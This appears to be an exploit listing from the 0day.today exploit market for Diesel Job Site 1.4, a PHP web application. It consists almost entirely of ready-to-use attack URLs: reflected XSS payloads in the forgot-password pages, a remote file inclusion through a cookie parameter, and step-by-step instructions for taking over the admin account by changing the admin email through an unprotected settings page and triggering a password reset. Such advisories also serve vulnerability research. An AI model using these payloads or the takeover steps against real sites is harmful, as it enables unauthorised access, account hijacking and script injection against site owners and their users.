[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Diesel Job Site 1.4 Multiple Vulnerabilities

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10524
Category
web applications
Date add
30-12-2009
Platform
unsorted
============================================
Diesel Job Site 1.4 Multiple Vulnerabilities
============================================

========================================================================================                 
| # Title    : Diesel Job Site 1.4 Multiple Vulnerabilities                            |
| # Author   : indoushka                                                               |
| # Script   : Powered by Diesel Job Site 1.4                                          |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
                                                                    |
======================      Exploit By indoushka       =================================
 
# XSS:
|
| 1- http://server/resume/jobseekers/forgot.php?uname=<ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&fu=Submit
| 2- http://server/resume/employers/forgot.php?ename=<img+src=http://127.0.0.1/1.gif+onload=alert(213771818860)>&fu=Submit
 
# RFI:
 
1- http://server/resume/index.php?_COOKIE[lang]=[EV!L]
 
# Admin Bypass:
  
1- http://server/resume/siteadmin/editsettings.php (1- edit the e-mail 4 admin and Searshing 4 admin name)
2- http://server/resume/siteadmin/forgot.php (2- put the name of admin and your email and submit)
3- go to your E-mail inbox you find the pass (?? ??? ????)
4- login to admin Aera http://127.0.0.1/resume/siteadmin/
 
# Bypass Settings:
  
1- http://server/resume/siteadmin/editsettings.php



#  0day.today [2024-12-25]  #